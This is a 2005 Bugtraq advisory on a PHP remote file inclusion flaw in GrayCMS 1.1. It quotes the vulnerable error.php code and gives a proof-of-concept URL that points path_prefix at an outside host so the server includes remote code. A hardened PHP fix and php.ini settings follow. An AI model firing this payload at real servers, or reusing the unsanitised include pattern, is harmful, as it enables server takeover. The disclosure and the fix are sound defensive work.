GrayCMS php code injection

From: Kold (maggik_at_gala.net)
Date: 04/26/05

    Date: 26 Apr 2005 11:45:32 -0000
    To: bugtraq@securityfocus.com

    Version: 1.1
    Severity: High
    Vendor: http://gcms.graymur.net/

    Vulnerable code is in "code/error.php":

    <----begin---->
    ...
    if (!isset($page)) $page = '';
    if (!isset($path_prefix)) $path_prefix = '../';
    if (empty($main)) {
      require $path_prefix.'code/main.dat';
    }
    if (isset($e404) or isset($_GET['e404'])) {

    ...
    }
    if (isset($e403) or isset($_GET['e403'])) {
    ...
    }

    require $path_prefix.'code/blocks.php';
    exit;
    <----end---->

    PoC:
    http://localhost/CMS/gcms/code/error.php?path_prefix=http://www.kiddiehost.com/
     
    mail me: maggik <at> gala <dot> net
    icq: 3316667
    greetz to: ghc, 0xdeadbabe, unl0ck & others
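
A hardened form of the include logic quoted above, as an added example that is not part of the original advisory or the vendor's code. It assumes error.php stays in the code/ directory under the install root (as the PoC URL suggests); GCMS_ROOT and gcms_local_path() are hypothetical names.

```php
<?php
// Hardened sketch of the include logic in code/error.php (added example).
// Assumption: error.php lives in <install root>/code/, as in the PoC URL.

// Fixed at load time from this file's own location; request data cannot change it.
define('GCMS_ROOT', realpath(dirname(__FILE__) . '/..') . DIRECTORY_SEPARATOR);

// Hypothetical helper: resolve an include relative to GCMS_ROOT and refuse
// anything that is not an existing local file under the install root.
function gcms_local_path($relative)
{
    // realpath() returns false for URLs and for files that do not exist,
    // and collapses any "../" sequences before the prefix comparison.
    $full = realpath(GCMS_ROOT . $relative);
    if ($full === false || strpos($full, GCMS_ROOT) !== 0 || !is_file($full)) {
        header('HTTP/1.1 500 Internal Server Error');
        exit;
    }
    return $full;
}

// Unconditional assignment: overwrites any value that register_globals
// populated from the query string, for later code that still reads $path_prefix.
$path_prefix = GCMS_ROOT;

if (!isset($page)) $page = '';
if (empty($main)) {
    require gcms_local_path('code/main.dat');
}

// ... e404 / e403 handling as in the original file (elided in the advisory) ...

require gcms_local_path('code/blocks.php');
exit;
```

The original only assigns $path_prefix when it is not already set, so a request parameter of that name survives into the require calls when register_globals is on. Setting register_globals and allow_url_fopen (or allow_url_include on PHP versions that have it) to Off in php.ini closes the same path at the configuration level.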

